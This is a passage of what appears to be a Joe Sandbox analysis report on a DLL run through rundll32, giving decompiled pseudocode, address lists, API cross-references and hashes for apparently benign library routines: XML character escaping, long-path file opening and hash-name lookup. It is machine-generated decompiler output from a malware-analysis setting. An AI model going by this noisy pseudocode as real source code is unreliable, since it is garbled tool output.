						_v56 = 0x100ac503;
						L100089C0();
						_t114 =  *_t129 & 0x000000ff;
						__eflags = _t114;
						if(_t114 != 0) {
							goto L56;
						} else {
						}
					}
					L58:
					_t179 =  &(_t179[0xb]);
					_t112 = _t170;
					_pop(_t129);
					_pop(_t170);
					_pop(_t161);
					_pop(_t177);
					_t178 = _t112;
					_push(_t170);
					_push(_t129);
					_t115 =  &(_t112[4]);
					_t180 = _t179 - 0x2c;
					_v29 = 0x27;
					_t130 =  *(_t115 - 8);
					_v40 = _t115;
					while(1) {
						_t116 = _a4;
						_t144 =  <=  ? _t116 : _t130;
						_t172 = _t130 - ( <=  ? _t116 : _t130);
						if(_t172 > 1) {
							break;
						}
						_t135 = _a12;
						if(_t116 >= _t130 || _t135 == _t130) {
							L22:
							__eflags = _t172;
							if(_t172 != 0) {
								_t172 = 1;
								break;
							}
						} else {
							_t154 =  >  ? 1 : 0xfffffffe - _t116;
							_t17 = _t116 + 1; // 0xffffffff
							_t121 = ( >  ? 1 : 0xfffffffe - _t116) + _t17;
							if(_t135 >> 1 >= _t130) {
								_t130 = _t130 + _t130;
								__eflags = _t130;
							} else {
								_t130 = _t135;
							}
							if(_t130 < _t121) {
								_t125 =  <=  ? _t135 : _t121;
								_t130 =  <=  ? _t135 : _t121;
							}
							_t163 =  *_t178;
							_v56 = _t130;
							if(_t163 == _v40) {
								 *_t180 = 0;
								_t123 = E10026280();
								__eflags = _t123;
								if(_t123 == 0) {
									goto L21;
								} else {
									goto L15;
								}
							} else {
								 *_t180 = _t163;
								_t123 = E10026280();
								if(_t123 == 0) {
									L21:
									_t116 = _a4;
									goto L22;
								} else {
									if(_t163 == 0) {
										L15:
										_t157 = _a4;
										_t164 = _t123;
										_t175 =  *_t178;
										_t136 = _t157 + 1;
										_v36 = _t175;
										__eflags = _t136 - 8;
										if(_t136 >= 8) {
											__eflags = _t123 & 0x00000001;
											if((_t123 & 0x00000001) != 0) {
												_t137 =  *_t175 & 0x000000ff;
												_t35 = _t123 + 1; // 0x1
												_t164 = _t35;
												_t175 = _t175 + 1;
												 *_t123 = _t137;
												_t136 = _t157;
											}
											__eflags = _t164 & 0x00000002;
											if((_t164 & 0x00000002) != 0) {
												_t158 =  *_t175 & 0x0000ffff;
												_t164 = _t164 + 2;
												_t175 = _t175 + 2;
												_t136 = _t136 - 2;
												 *(_t164 - 2) = _t158;
											}
											__eflags = _t164 & 0x00000004;
											if((_t164 & 0x00000004) == 0) {
												goto L16;
											} else {
												_t167 = _t164 + 4;
												 *(_t167 - 4) =  *_t175;
												_t124 = memcpy(_t167, _t175 + 4, _t136 - 4);
												_t180 =  &(_t180[3]);
												goto L8;
											}
										} else {
											L16:
											_t124 = memcpy(_t164, _t175, _t136);
											_t180 =  &(_t180[3]);
											goto L8;
										}
										goto L23;
									}
									L8:
									 *_t178 = _t124;
									_a8 = _t130;
									continue;
								}
							}
						}
						L23:
						__eflags = 0xfffffffa;
						_t149 =  >  ? 1 : 0xfffffffa - _t116;
						_t150 = ( >  ? 1 : 0xfffffffa - _t116) + _t116;
						_t117 = _a8;
						_a4 = 0xfffffffa;
						__eflags = _t117;
						if(_t117 != 0) {
							_t118 = _t117 - 1;
							__eflags = _t118 - 0xfffffffa;
							_t119 =  >  ? _t150 : _t118;
							 *((char*)( *_t178 + _t119)) = 0;
							return _t119;
						}
						return _t117;
						goto L122;
					}
					_t173 = _t172 - 1;
					__eflags = _t173;
					_t174 =  >  ? 1 : _t173;
					_t146 = _v29;
					_t133 =  *_t178 + _t116;
					__eflags = _t174;
					if(_t174 != 0) {
						_t120 = 0;
						__eflags = 0;
						do {
							 *((char*)(_t133 + _t120)) = _t146;
							_t120 = _t120 + 1;
							__eflags = _t120 - _t174;
						} while (_t120 < _t174);
						_t116 = _a4;
					}
					goto L23;
				} else {
					__eflags = __eax - 3;
					if(__eax != 3) {
						__eax =  *__ebx;
						__eflags = __al;
						if(__al != 0) {
							__eflags = __cl & 0x00000002;
							if((__cl & 0x00000002) == 0) {
								_v37 = 1;
								__ebp = _v44;
								__edi = __ebx;
								__eflags = _v44;
								if(_v44 == 0) {
									_v36 = __ecx;
									while(1) {
										 *__esp = " \n\t\r";
										__ebp = __al;
										_v56 = __ebp;
										__eax = strchr(??, ??);
										_v56 = __ebp;
										 *__esp = "\'\\";
										_v44 = __eax;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax == 0) {
											goto L118;
										}
										L113:
										__edx = 0x5c;
										__eax = __esi;
										L1();
										L114:
										__edx =  *__edi;
										__eax = __esi;
										__edi = __edi + 1;
										L1();
										__eax =  *__edi & 0x000000ff;
										__eflags = __al;
										if(__al != 0) {
											__eflags = __ebx - __edi;
											if(__ebx == __edi) {
												_v37 = 1;
											} else {
												__eflags =  *(__edi + 1);
												_v37 =  *(__edi + 1) == 0;
											}
											continue;
										}
										goto L53;
										L118:
										__edx = _v44;
										__eflags = _v44;
										if(_v44 != 0) {
											__eflags = _v36 & 0x00000001;
											if((_v36 & 0x00000001) != 0) {
												goto L113;
											} else {
												__eflags = _v37;
												if(_v37 != 0) {
													goto L113;
												} else {
												}
											}
										}
										goto L114;
									}
								} else {
									_v32 = __ecx;
									while(1) {
										 *__esp = " \n\t\r";
										__ebp = __al;
										_v56 = __ebp;
										__eax = strchr(??, ??);
										_v56 = __ebp;
										_v36 = __eax;
										__eax = _v44;
										 *__esp = _v44;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax == 0) {
											goto L97;
										}
										L70:
										__edx = 0x5c;
										__eax = __esi;
										L1();
										L71:
										__edx =  *__edi;
										__eax = __esi;
										__edi = __edi + 1;
										L1();
										__eax =  *__edi & 0x000000ff;
										__eflags = __al;
										if(__al != 0) {
											__eflags = __ebx - __edi;
											if(__ebx == __edi) {
												_v37 = 1;
											} else {
												__eflags =  *(__edi + 1);
												_v37 =  *(__edi + 1) == 0;
											}
											continue;
										}
										goto L53;
										L97:
										__eax = strchr("\'\\", __ebp);
										__eflags = __eax;
										if(__eax != 0) {
											goto L70;
										} else {
											__eax = _v36;
											__eflags = _v36;
											if(_v36 != 0) {
												__eflags = _v32 & 0x00000001;
												if((_v32 & 0x00000001) != 0) {
													goto L70;
												} else {
													__eflags = _v37;
													if(_v37 != 0) {
														goto L70;
													} else {
													}
												}
											}
										}
										goto L71;
									}
								}
							} else {
								__edx = _v44;
								__eflags = _v44;
								if(_v44 == 0) {
									while(1) {
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eflags =  *__ebx;
										if( *__ebx == 0) {
											goto L53;
										}
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eflags =  *__ebx;
										if( *__ebx == 0) {
											return __eax;
										}
									}
								} else {
									do {
										_v56 = __eax;
										__eax = _v44;
										 *__esp = _v44;
										__eax = strchr(??, ??);
										__eflags = __eax;
										if(__eax != 0) {
											__edx = 0x5c;
											__eax = __esi;
											L1();
										}
										__edx =  *__ebx;
										__eax = __esi;
										__ebx = __ebx + 1;
										L1();
										__eax =  *__ebx;
										__eflags = __al;
									} while (__al != 0);
								}
							}
						}
					} else {
						__eax =  *__ebx & 0x000000ff;
						__eflags = __al;
						if(__al != 0) {
							__edx = __ecx;
							__edx = __ecx & 0x00000008;
							__eflags = __cl & 0x00000004;
							if((__cl & 0x00000004) != 0) {
								__eflags = __edx;
								if(__edx == 0) {
									goto L85;
								} else {
									do {
										__dl = __al;
										__dl = __al - 0x22;
										__eflags = __dl - 0x1c;
										if(__dl > 0x1c) {
											L89:
											__edx = __al;
											__eax = __esi;
											L1();
											goto L90;
										}
										__edx = __dl & 0x000000ff;
										switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M100AC530))) {
											case 0:
												 *__esp = __esi;
												__eax = "&quot;";
												_v52 = "&quot;";
												__eax = 0x100ac500;
												_v56 = 0x100ac500;
												__eax = L100089C0();
												goto L90;
											case 1:
												goto L89;
											case 2:
												 *__esp = __esi;
												__eax = 0x100ac508;
												_v52 = 0x100ac508;
												__eax = 0x100ac500;
												_v56 = 0x100ac500;
												__eax = L100089C0();
												goto L90;
											case 3:
												 *__esp = __esi;
												__eax = "&apos;";
												_v52 = "&apos;";
												__eax = 0x100ac500;
												_v56 = 0x100ac500;
												__eax = L100089C0();
												goto L90;
											case 4:
												 *__esp = __esi;
												__edi = 0x100ac50e;
												__ebp = 0x100ac500;
												_v52 = 0x100ac50e;
												_v56 = 0x100ac500;
												__eax = L100089C0();
												goto L90;
											case 5:
												 *__esp = __esi;
												__edx = 0x100ac513;
												__ecx = 0x100ac500;
												_v52 = 0x100ac513;
												_v56 = 0x100ac500;
												__eax = L100089C0();
												goto L90;
										}
										L90:
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
									return __eax;
								}
								do {
									goto L85;
									L84:
									__eax =  *(__ebx + 1) & 0x000000ff;
									__ebx = __ebx + 1;
									__eflags = __al;
								} while (__al != 0);
								goto L53;
								L85:
								__eflags = __al - 0x3c;
								if(__eflags == 0) {
									 *__esp = __esi;
									__eax = 0x100ac50e;
									__edx = 0x100ac500;
									_v52 = 0x100ac50e;
									_v56 = 0x100ac500;
									__eax = L100089C0();
								} else {
									if(__eflags <= 0) {
										__eflags = __al - 0x26;
										if(__al == 0x26) {
											 *__esp = __esi;
											__eax = 0x100ac508;
											_v52 = 0x100ac508;
											__eax = 0x100ac500;
											_v56 = 0x100ac500;
											__eax = L100089C0();
										} else {
											__eflags = __al - 0x27;
											if(__al != 0x27) {
												goto L103;
											} else {
												 *__esp = __esi;
												__ebp = "&apos;";
												__eax = 0x100ac500;
												_v52 = "&apos;";
												_v56 = 0x100ac500;
												__eax = L100089C0();
											}
										}
									} else {
										__eflags = __al - 0x3e;
										if(__al != 0x3e) {
											L103:
											__edx = __al;
											__eax = __esi;
											L1();
										} else {
											 *__esp = __esi;
											__ecx = 0x100ac513;
											__edi = 0x100ac500;
											_v52 = 0x100ac513;
											_v56 = 0x100ac500;
											__eax = L100089C0();
										}
									}
								}
								goto L84;
							} else {
								__eflags = __edx;
								if(__edx == 0) {
									do {
										__eflags = __al - 0x3c;
										if(__al == 0x3c) {
											 *__esp = __esi;
											__ebp = 0x100ac50e;
											__eax = 0x100ac500;
											_v52 = 0x100ac50e;
											_v56 = 0x100ac500;
											__eax = L100089C0();
										} else {
											__eflags = __al - 0x3e;
											if(__al != 0x3e) {
												__eflags = __al - 0x26;
												if(__al == 0x26) {
													 *__esp = __esi;
													__eax = 0x100ac508;
													_v52 = 0x100ac508;
													__eax = 0x100ac500;
													_v56 = 0x100ac500;
													__eax = L100089C0();
												} else {
													__edx = __al;
													__eax = __esi;
													L1();
												}
											} else {
												 *__esp = __esi;
												__ecx = 0x100ac513;
												__edi = 0x100ac500;
												_v52 = 0x100ac513;
												_v56 = 0x100ac500;
												__eax = L100089C0();
											}
										}
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
								} else {
									do {
										__eflags = __al - 0x3c;
										if(__eflags == 0) {
											 *__esp = __esi;
											__edx = 0x100ac50e;
											__ecx = 0x100ac500;
											_v52 = 0x100ac50e;
											_v56 = 0x100ac500;
											__eax = L100089C0();
										} else {
											if(__eflags <= 0) {
												__eflags = __al - 0x22;
												if(__al == 0x22) {
													 *__esp = __esi;
													__eax = "&quot;";
													_v52 = "&quot;";
													__eax = 0x100ac500;
													_v56 = 0x100ac500;
													__eax = L100089C0();
												} else {
													__eflags = __al - 0x26;
													if(__al != 0x26) {
														goto L102;
													} else {
														 *__esp = __esi;
														__eax = 0x100ac508;
														_v52 = 0x100ac508;
														__eax = 0x100ac500;
														_v56 = 0x100ac500;
														__eax = L100089C0();
													}
												}
											} else {
												__eflags = __al - 0x3e;
												if(__al != 0x3e) {
													L102:
													__edx = __al;
													__eax = __esi;
													L1();
												} else {
													 *__esp = __esi;
													__edi = 0x100ac513;
													__ebp = 0x100ac500;
													_v52 = 0x100ac513;
													_v56 = 0x100ac500;
													__eax = L100089C0();
												}
											}
										}
										goto L41;
										L41:
										__eax =  *(__ebx + 1) & 0x000000ff;
										__ebx = __ebx + 1;
										__eflags = __al;
									} while (__al != 0);
								}
							}
						}
					}
					L53:
					return __eax;
				}
				L122:
			}

0x10009734
0x1000973b
0x1000973f
0x10009747
0x1000974b
0x10009752
0x10009877
0x1000987c
0x1000987f
0x10009881
0x10009890
0x10009890
0x10009890
0x10009892
0x00000000
0x00000000
0x10009897
0x1000989a
0x1000989f
0x100098a2
0x100098a4
0x00000000
0x00000000
0x00000000
0x100098a4
0x100098c0
0x100098c8
0x100098c9
0x100098cd
0x100098d2
0x100098d5
0x100098d7
0x00000000
0x00000000
0x100098d9
0x100098d7
0x100098a6
0x100098a6
0x100098a9
0x100098ab
0x100098b1
0x100098b2
0x100098b3
0x100086f1
0x100086f4
0x100086f5
0x100086f6
0x100086f9
0x100086fc
0x10008700
0x10008703
0x10008746
0x10008746
0x1000874f
0x10008752
0x10008757
0x00000000
0x00000000
0x1000875f
0x10008762
0x100087f4
0x100087f4
0x100087f6
0x1000882b
0x00000000
0x1000882b
0x10008770
0x1000877f
0x10008782
0x10008782
0x1000878c
0x10008710
0x10008710
0x1000878e
0x1000878e
0x1000878e
0x10008714
0x10008718
0x1000871b
0x1000871b
0x1000871d
0x10008720
0x1000872a
0x10008798
0x1000879f
0x100087a4
0x100087a6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000872c
0x1000872c
0x1000872f
0x10008736
0x100087f1
0x100087f1
0x00000000
0x1000873c
0x1000873e
0x100087a8
0x100087a8
0x100087ab
0x100087ad
0x100087b0
0x100087b3
0x100087b7
0x100087ba
0x100087c0
0x100087c2
0x10008859
0x1000885c
0x1000885c
0x1000885f
0x10008860
0x10008862
0x10008862
0x100087c8
0x100087ce
0x10008869
0x1000886c
0x1000886f
0x10008872
0x10008875
0x10008875
0x100087d4
0x100087da
0x00000000
0x100087dc
0x100087de
0x100087e7
0x100087ea
0x100087ea
0x00000000
0x100087ea
0x100087bc
0x100087bc
0x100087bc
0x100087bc
0x00000000
0x100087bc
0x00000000
0x100087ba
0x10008740
0x10008740
0x10008743
0x00000000
0x10008743
0x10008736
0x1000872a
0x100087f8
0x10008804
0x10008807
0x1000880a
0x1000880c
0x1000880f
0x10008812
0x10008814
0x10008816
0x10008817
0x10008819
0x1000881f
0x00000000
0x1000881f
0x1000882a
0x00000000
0x1000882a
0x10008833
0x10008839
0x1000883c
0x1000883f
0x10008844
0x10008846
0x10008848
0x1000884a
0x1000884a
0x1000884c
0x1000884c
0x1000884f
0x10008850
0x10008850
0x10008854
0x10008854
0x00000000
0x10009758
0x10009758
0x1000975b
0x10009808
0x1000980b
0x1000980d
0x1000980f
0x10009812
0x10009930
0x10009935
0x10009939
0x1000993b
0x1000993d
0x10009c70
0x10009c80
0x10009c80
0x10009c87
0x10009c8a
0x10009c8e
0x10009c93
0x10009c97
0x10009c9e
0x10009ca2
0x10009ca7
0x10009ca9
0x00000000
0x00000000
0x10009cab
0x10009cab
0x10009cb0
0x10009cb2
0x10009cb7
0x10009cb7
0x10009cba
0x10009cbc
0x10009cbd
0x10009cc2
0x10009cc5
0x10009cc7
0x10009ccd
0x10009ccf
0x10009ce0
0x10009cd1
0x10009cd1
0x10009cd5
0x10009cd5
0x00000000
0x10009ccf
0x00000000
0x10009cf0
0x10009cf0
0x10009cf4
0x10009cf6
0x10009cf8
0x10009cfd
0x00000000
0x10009cff
0x10009cff
0x10009d04
0x00000000
0x00000000
0x10009d06
0x10009d04
0x10009cfd
0x00000000
0x10009cf6
0x10009943
0x10009943
0x10009950
0x10009950
0x10009957
0x1000995a
0x1000995e
0x10009963
0x10009967
0x1000996b
0x1000996f
0x10009972
0x10009977
0x10009979
0x00000000
0x00000000
0x1000997f
0x1000997f
0x10009984
0x10009986
0x1000998b
0x1000998b
0x1000998e
0x10009990
0x10009991
0x10009996
0x10009999
0x1000999b
0x100099a1
0x100099a3
0x10009ba0
0x100099a9
0x100099a9
0x100099ad
0x100099ad
0x00000000
0x100099a3
0x00000000
0x10009b40
0x10009b4b
0x10009b50
0x10009b52
0x00000000
0x10009b58
0x10009b58
0x10009b5c
0x10009b5e
0x10009b64
0x10009b69
0x00000000
0x10009b6f
0x10009b6f
0x10009b74
0x00000000
0x00000000
0x10009b7a
0x10009b74
0x10009b69
0x10009b5e
0x00000000
0x10009b52
0x10009950
0x10009818
0x10009818
0x1000981c
0x1000981e
0x100099b8
0x100099b8
0x100099bb
0x100099bd
0x100099be
0x100099c3
0x100099c6
0x00000000
0x00000000
0x100099cc
0x100099cf
0x100099d1
0x100099d2
0x100099d7
0x100099da
0x00000000
0x00000000
0x100099da
0x00000000
0x10009830
0x10009830
0x10009834
0x10009838
0x1000983b
0x10009840
0x10009842
0x10009844
0x10009849
0x1000984b
0x1000984b
0x10009850
0x10009853
0x10009855
0x10009856
0x1000985b
0x1000985e
0x1000985e
0x10009830
0x1000981e
0x10009812
0x10009761
0x10009761
0x10009764
0x10009766
0x1000976c
0x1000976e
0x10009771
0x10009774
0x100099e8
0x100099ea
0x00000000
0x100099f0
0x100099f0
0x100099f0
0x100099f2
0x100099f5
0x100099f8
0x10009a88
0x10009a88
0x10009a8b
0x10009a8d
0x00000000
0x10009a8d
0x100099fe
0x10009a01
0x00000000
0x10009b17
0x10009b1a
0x10009b1f
0x10009b23
0x10009b28
0x10009b2c
0x00000000
0x00000000
0x00000000
0x00000000
0x10009aa4
0x10009aa7
0x10009aac
0x10009ab0
0x10009ab5
0x10009ab9
0x00000000
0x00000000
0x10009af8
0x10009afb
0x10009b00
0x10009b04
0x10009b09
0x10009b0d
0x00000000
0x00000000
0x10009adc
0x10009adf
0x10009ae4
0x10009ae9
0x10009aed
0x10009af1
0x00000000
0x00000000
0x10009ac0
0x10009ac3
0x10009ac8
0x10009acd
0x10009ad1
0x10009ad5
0x00000000
0x00000000
0x10009a92
0x10009a92
0x10009a96
0x10009a97
0x10009a97
0x00000000
0x100099f0
0x10009a4d
0x00000000
0x10009a40
0x10009a40
0x10009a44
0x10009a45
0x10009a45
0x00000000
0x10009a4d
0x10009a4d
0x10009a4f
0x10009c10
0x10009c13
0x10009c18
0x10009c1d
0x10009c21
0x10009c25
0x10009a55
0x10009a55
0x10009a10
0x10009a12
0x10009c30
0x10009c33
0x10009c38
0x10009c3c
0x10009c41
0x10009c45
0x10009a18
0x10009a18
0x10009a1a
0x00000000
0x10009a20
0x10009a20
0x10009a23
0x10009a28
0x10009a2d
0x10009a31
0x10009a35
0x10009a35
0x10009a1a
0x10009a57
0x10009a57
0x10009a60
0x10009b90
0x10009b90
0x10009b93
0x10009b95
0x10009a66
0x10009a66
0x10009a69
0x10009a6e
0x10009a73
0x10009a77
0x10009a7b
0x10009a7b
0x10009a60
0x10009a55
0x00000000
0x1000977a
0x1000977a
0x1000977c
0x100098ff
0x100098ff
0x10009901
0x10009bd0
0x10009bd3
0x10009bd8
0x10009bdd
0x10009be1
0x10009be5
0x10009907
0x10009907
0x10009909
0x100098e0
0x100098e2
0x10009bb0
0x10009bb3
0x10009bb8
0x10009bbc
0x10009bc1
0x10009bc5
0x100098e8
0x100098e8
0x100098eb
0x100098ed
0x100098ed
0x1000990b
0x1000990b
0x1000990e
0x10009913
0x10009918
0x1000991c
0x10009920
0x10009920
0x10009909
0x100098f2
0x100098f6
0x100098f7
0x100098f7
0x10009782
0x100097cd
0x100097cd
0x100097cf
0x10009bf0
0x10009bf3
0x10009bf8
0x10009bfd
0x10009c01
0x10009c05
0x100097d5
0x100097d5
0x10009788
0x1000978a
0x10009c50
0x10009c53
0x10009c58
0x10009c5c
0x10009c61
0x10009c65
0x10009790
0x10009790
0x10009792
0x00000000
0x10009798
0x10009798
0x1000979b
0x100097a0
0x100097a4
0x100097a9
0x100097ad
0x100097ad
0x10009792
0x100097d7
0x100097d7
0x100097e0
0x10009b80
0x10009b80
0x10009b83
0x10009b85
0x100097e6
0x100097e6
0x100097e9
0x100097ee
0x100097f3
0x100097f7
0x100097fb
0x100097fb
0x100097e0
0x100097d5
0x00000000
0x100097c0
0x100097c0
0x100097c4
0x100097c5
0x100097c5
0x100097cd
0x1000977c
0x10009774
0x10009766
0x10009869
0x10009869
0x10009869
0x00000000

APIs

mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
strchr.MSVCRT ref: 1000983B
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009920
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05

Strings

&, xrefs: 1000979B, 10009AA7, 10009BB3, 10009C33
>, xrefs: 100097E9, 1000990E, 10009A69, 10009AC3
", xrefs: 10009B1A, 10009C53
', xrefs: 10009A23, 10009AFB
<, xrefs: 10009ADF, 10009BD3, 10009BF3, 10009C13
'\'', xrefs: 100098C3

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf$strchr
String ID: &$'$>$<$"$'\''
API String ID: 2626076477-3929336650
Opcode ID: 12b6750b4a52a26ed5acad3795ae941bdf77578173880ce7d0d3f74c73066fa8
Instruction ID: db27ddebd36c8a04df1f9b29fc46dfe65a5f1e33d3c32a01edac565b911f7663
Opcode Fuzzy Hash: 12b6750b4a52a26ed5acad3795ae941bdf77578173880ce7d0d3f74c73066fa8
Instruction Fuzzy Hash: 7BD18174908B95CAE710DF29804076EBBE1FF826C0F56881EF9D58B20AD735E985D783

Uniqueness

Uniqueness Score: -1.00%

Function 100195E0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
mv_calloc.MAIN ref: 1001964E
MultiByteToWideChar.KERNEL32 ref: 10019685
mv_calloc.MAIN ref: 100196D7
mv_freep.MAIN ref: 10019713
wcslen.MSVCRT ref: 1001971F
_wsopen.MSVCRT ref: 1001974B
mv_freep.MAIN ref: 10019758
_sopen.MSVCRT ref: 1001978A
_errno.MSVCRT ref: 100197F5
wcslen.MSVCRT ref: 1001981B
mv_calloc.MAIN ref: 10019857
wcscpy.MSVCRT ref: 10019872
wcscat.MSVCRT ref: 10019882
mv_freep.MAIN ref: 1001988A
_errno.MSVCRT ref: 100198E1
mv_freep.MAIN ref: 100198F4
mv_calloc.MAIN ref: 10019912
wcscpy.MSVCRT ref: 10019929
wcscat.MSVCRT ref: 1001993C
_errno.MSVCRT ref: 10019946
_errno.MSVCRT ref: 10019958

Strings

\\?\UNC\, xrefs: 10019920
\\?\, xrefs: 10019869

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
String ID: \\?\$\\?\UNC\
API String ID: 2585690843-3019864461
Opcode ID: 3b770d789a6b7b9b259c4104553542867824734224feeea9d00b87784f6ee047
Instruction ID: f678d7e62f75a51a3396b5e92a4772b9af71e601e6ce56c2c03e9c047c1b1921
Opcode Fuzzy Hash: 3b770d789a6b7b9b259c4104553542867824734224feeea9d00b87784f6ee047
Instruction Fuzzy Hash: 8F91C2B49097119FD350EF69C98421EBBE0FF89754F55892EF898CB390E774D8809B82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C790 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E1001C790(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v40;
				intOrPtr _t10;
				void* _t11;
				intOrPtr* _t12;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;

				_t10 = 0x100b2e05;
				_t16 = 0;
				_t23 = _t22 - 0x1c;
				_t21 = _a4;
				_t17 = _a8;
				 *_t21 = 0;
				while(1) {
					_v40 = _t10;
					 *_t23 = _t17;
					_t11 = L10006B30();
					_t19 = _t11;
					if(_t11 == 0) {
						break;
					}
					_t16 = _t16 + 1;
					if(_t16 != 0xf) {
						_t10 =  *((intOrPtr*)(0x100b3000 + _t16 * 8));
						continue;
					} else {
						return 0xffffffea;
					}
					L19:
				}
				 *_t23 = 0x10;
				_t12 = E100265E0();
				_t18 = _t12;
				if(_t12 == 0) {
					L18:
					_t19 = 0xfffffff4;
				} else {
					 *(_t12 + 4) = _t16;
					if(_t16 > 0xd) {
						L10:
						 *_t21 = _t18;
					} else {
						switch( *((intOrPtr*)(_t16 * 4 +  &M100B2E0C))) {
							case 0:
								__eax = L10025C70();
								goto L9;
							case 1:
								__eax = E100274A0();
								goto L9;
							case 2:
								__eax = L10039950();
								goto L9;
							case 3:
								__eax = E1003E680();
								goto L9;
							case 4:
								_t14 = E10049740();
								L9:
								 *_t18 = _t14;
								if(_t14 == 0) {
									 *_t23 = _t18;
									L100265B0();
									goto L18;
								} else {
									goto L10;
								}
								goto L11;
							case 5:
								 *((intOrPtr*)(__edi + 8)) = L1000FDB0(__ebx, 4);
								goto L10;
						}
					}
				}
				L11:
				return _t19;
				goto L19;
			}

0x1001c791
0x1001c799
0x1001c79b
0x1001c79e
0x1001c7a2
0x1001c7a6
0x1001c7b7
0x1001c7b7
0x1001c7bb
0x1001c7be
0x1001c7c5
0x1001c7c7
0x00000000
0x00000000
0x1001c7c9
0x1001c7cd
0x1001c7b0
0x00000000
0x1001c7cf
0x1001c7dd
0x1001c7dd
0x00000000
0x1001c7cd
0x1001c7e0
0x1001c7e7
0x1001c7ee
0x1001c7f0
0x1001c865
0x1001c865
0x1001c7f2
0x1001c7f2
0x1001c7f8
0x1001c813
0x1001c813
0x1001c7fa
0x1001c7fa
0x00000000
0x1001c848
0x00000000
0x00000000
0x1001c852
0x00000000
0x00000000
0x1001c820
0x00000000
0x00000000
0x1001c830
0x00000000
0x00000000
0x1001c808
0x1001c80d
0x1001c80d
0x1001c811
0x1001c859
0x1001c860
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c843
0x00000000
0x00000000
0x1001c7fa
0x1001c7f8
0x1001c816
0x1001c81f
0x00000000

APIs

mv_strcasecmp.MAIN ref: 1001C7BE
mv_mallocz.MAIN ref: 1001C7E7

Strings

MD5, xrefs: 1001C791

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_malloczmv_strcasecmp
String ID: MD5
API String ID: 1451953452-1168476579
